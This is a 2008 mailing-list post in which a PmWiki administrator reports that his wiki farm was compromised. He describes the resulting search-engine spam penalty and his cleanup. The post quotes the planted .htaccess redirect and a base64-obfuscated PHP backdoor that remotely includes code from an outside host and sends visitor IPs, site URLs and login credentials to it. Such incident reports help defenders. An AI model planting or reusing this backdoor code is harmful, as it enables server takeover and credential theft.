[pmwiki-users] PmWiki security

kjettil kjettil at wanadoo.fr
Mon May 12 12:00:50 CDT 2008


I just detected that one of my PmWiki sites, previously coming up as no
1 on Google search, had completely disappeared from search results.
I then discovered that Google search for the domain (on shared hosting)
on which I have several PmWiki sites (a WikiFarm) had a lot of strangely
looking results, viz. to filenames I couldn't recognize.
Further examination showed that several wiki sites and the home wiki had
been "modified".

Common to all cases are that wiki.d (or in a couple of cases another
directory with linked files) has been chmod 777, to allow editing. Also
sites that are password-protected from read and write have been manipulated.

In these cases, none of the existing files have been modified or
deleted, but an .htaccess file with contents:

Options -MultiViews
ErrorDocument 404 //ahw/wiki.d/CurrentVisitors/tests.php

(or similar, depending on wiki, directory, file name and location)

as well as one or more (in one case dozens of) .php files (with a
variety of names) and with varying contents, but all similar to this:

<?php error_reporting(0);if(isset($_POST["l"]) and
isset($_POST["p"])){if(isset($_POST["input"])){$user_auth="&l=".base64_encode($_POST["l"])."
&p=".base64_encode(md5($_POST["p"]));}else{$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];}}
else{$user_auth="";}if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(!@include_once(base64_decode("aHR0cDovLw==").
"hiddzzazbzczdifzb".base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", 

ip2long(getenv(REMOTE_ADDR)))."&url=".base64_encode($_SERVER["SERVER_NAME"].
$_SERVER[REQUEST_URI]).$user_auth.$log_flg)){if($_POST["l"]=="special"){print 

"sys_active".`uname -a`;}} ?>

have been inserted (all at about the same time (a few minutes after
mid-night between 29 Feb -1 Mar in western Asia) in all wikis, so the
attack must have been automated).

Search engines have been fed with heaps of links to rubbish contents and
seem to have concluded that this domain is a spam domain. Luckily,
several other domains/sites I have, also using PmWiki, have not been hit.

I don't know how the intruder technically did this.
My immediate action is to clean the sites from inserted files and chmod
all critical wiki.d directories to 755.
That cleaning is a simple task.
Worse is that my domain may now have been for ever black-listed by
search engines.

/kjettil






More information about the pmwiki-users mailing list